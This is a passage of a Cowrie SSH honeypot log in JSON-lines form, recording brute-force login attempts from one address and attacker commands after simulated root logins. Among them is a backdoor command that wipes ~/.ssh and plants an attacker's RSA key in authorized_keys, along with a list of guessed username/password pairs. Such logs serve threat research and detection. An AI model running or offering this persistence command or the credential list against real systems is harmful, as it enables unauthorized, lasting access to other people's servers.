nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:24:58.228847Z","src_ip":"212.227.235.229","session":"aabfc0883bf9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:24:59.271258Z","src_ip":"212.227.235.229","session":"aabfc0883bf9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:25:00.525041Z","src_ip":"212.227.235.229","session":"aabfc0883bf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37476,"dst_ip":"1.2.3.4","dst_port":22,"session":"859766aca3e7","protocol":"ssh","message":"New connection: 212.227.235.229:37476 (1.2.3.4:22) [session: 859766aca3e7]","sensor":"my-vps","timestamp":"2025-09-09T01:25:00.775703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:25:00.776520Z","src_ip":"212.227.235.229","session":"859766aca3e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:25:01.027973Z","src_ip":"212.227.235.229","session":"859766aca3e7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:25:02.077386Z","src_ip":"212.227.235.229","session":"859766aca3e7"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:25:02.331269Z","src_ip":"212.227.235.229","session":"65e6692561b2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:25:02.332652Z","src_ip":"212.227.235.229","session":"859766aca3e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49150,"dst_ip":"1.2.3.4","dst_port":22,"session":"238cd3923139","protocol":"ssh","message":"New connection: 212.227.235.229:49150 (1.2.3.4:22) [session: 238cd3923139]","sensor":"my-vps","timestamp":"2025-09-09T01:25:29.227895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:25:29.233669Z","src_ip":"212.227.235.229","session":"238cd3923139"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:25:29.489503Z","src_ip":"212.227.235.229","session":"238cd3923139"}
{"eventid":"cowrie.login.failed","username":"tester","password":"111111","message":"login attempt [tester/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:25:30.500005Z","src_ip":"212.227.235.229","session":"238cd3923139"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:25:31.767297Z","src_ip":"212.227.235.229","session":"238cd3923139"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36200,"dst_ip":"1.2.3.4","dst_port":22,"session":"700545daaced","protocol":"ssh","message":"New connection: 212.227.235.229:36200 (1.2.3.4:22) [session: 700545daaced]","sensor":"my-vps","timestamp":"2025-09-09T01:25:33.955597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:25:33.956265Z","src_ip":"212.227.235.229","session":"700545daaced"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:25:34.065162Z","src_ip":"212.227.235.229","session":"700545daaced"}
{"eventid":"cowrie.login.failed","username":"csserver","password":"csserver","message":"login attempt [csserver/csserver] failed","sensor":"my-vps","timestamp":"2025-09-09T01:25:34.539030Z","src_ip":"212.227.235.229","session":"700545daaced"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:25:35.649302Z","src_ip":"212.227.235.229","session":"700545daaced"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59790,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea20a7177e9b","protocol":"ssh","message":"New connection: 212.227.235.229:59790 (1.2.3.4:22) [session: ea20a7177e9b]","sensor":"my-vps","timestamp":"2025-09-09T01:25:58.248235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:25:58.249209Z","src_ip":"212.227.235.229","session":"ea20a7177e9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:25:58.368643Z","src_ip":"212.227.235.229","session":"ea20a7177e9b"}
{"eventid":"cowrie.login.failed","username":"ibrahim","password":"qwerty","message":"login attempt [ibrahim/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T01:25:58.885494Z","src_ip":"212.227.235.229","session":"ea20a7177e9b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64342,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2a7e08f76e","protocol":"ssh","message":"New connection: 217.72.205.35:64342 (1.2.3.4:22) [session: 7e2a7e08f76e]","sensor":"my-vps","timestamp":"2025-09-09T01:25:59.820165Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:25:59.821193Z","src_ip":"217.72.205.35","session":"7e2a7e08f76e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:00.005843Z","src_ip":"212.227.235.229","session":"ea20a7177e9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43516,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc766442111f","protocol":"ssh","message":"New connection: 212.227.235.229:43516 (1.2.3.4:22) [session: fc766442111f]","sensor":"my-vps","timestamp":"2025-09-09T01:26:02.870499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:02.871490Z","src_ip":"212.227.235.229","session":"fc766442111f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:03.102037Z","src_ip":"212.227.235.229","session":"fc766442111f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qweASD","message":"login attempt [admin/123qweASD] failed","sensor":"my-vps","timestamp":"2025-09-09T01:26:04.063065Z","src_ip":"212.227.235.229","session":"fc766442111f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:05.296469Z","src_ip":"212.227.235.229","session":"fc766442111f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46818,"dst_ip":"1.2.3.4","dst_port":22,"session":"e460657b95cc","protocol":"ssh","message":"New connection: 212.227.235.229:46818 (1.2.3.4:22) [session: e460657b95cc]","sensor":"my-vps","timestamp":"2025-09-09T01:26:06.384147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:06.385098Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:06.656117Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:26:07.781830Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:26:08.378746Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:26:08.379465Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:26:08.380527Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:08.652556Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:26:09.211449Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:26:09.212140Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:26:09.485095Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:09.486172Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46820,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ba3e2ec12b9","protocol":"ssh","message":"New connection: 212.227.235.229:46820 (1.2.3.4:22) [session: 2ba3e2ec12b9]","sensor":"my-vps","timestamp":"2025-09-09T01:26:09.752933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:09.753835Z","src_ip":"212.227.235.229","session":"2ba3e2ec12b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:10.022802Z","src_ip":"212.227.235.229","session":"2ba3e2ec12b9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:26:11.137495Z","src_ip":"212.227.235.229","session":"2ba3e2ec12b9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:12.408782Z","src_ip":"212.227.235.229","session":"2ba3e2ec12b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46828,"dst_ip":"1.2.3.4","dst_port":22,"session":"df8bedcec8a1","protocol":"ssh","message":"New connection: 212.227.235.229:46828 (1.2.3.4:22) [session: df8bedcec8a1]","sensor":"my-vps","timestamp":"2025-09-09T01:26:12.669803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:12.670696Z","src_ip":"212.227.235.229","session":"df8bedcec8a1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:26:12.932725Z","src_ip":"212.227.235.229","session":"df8bedcec8a1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:26:14.024101Z","src_ip":"212.227.235.229","session":"df8bedcec8a1"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:14.287516Z","src_ip":"212.227.235.229","session":"e460657b95cc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:26:14.288466Z","src_ip":"212.227.235.229","session":"df8bedcec8a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42174,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e19b09845a9","protocol":"ssh","message":"New connection: 212.227.235.229:42174 (1.2.3.4:22) [session: 5e19b09845a9]","sensor":"my-vps","timestamp":"2025-09-09T01:26:18.458102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:26:18.459049Z","src_ip":"212.227.235.229","session":"5e19b09845a9"}
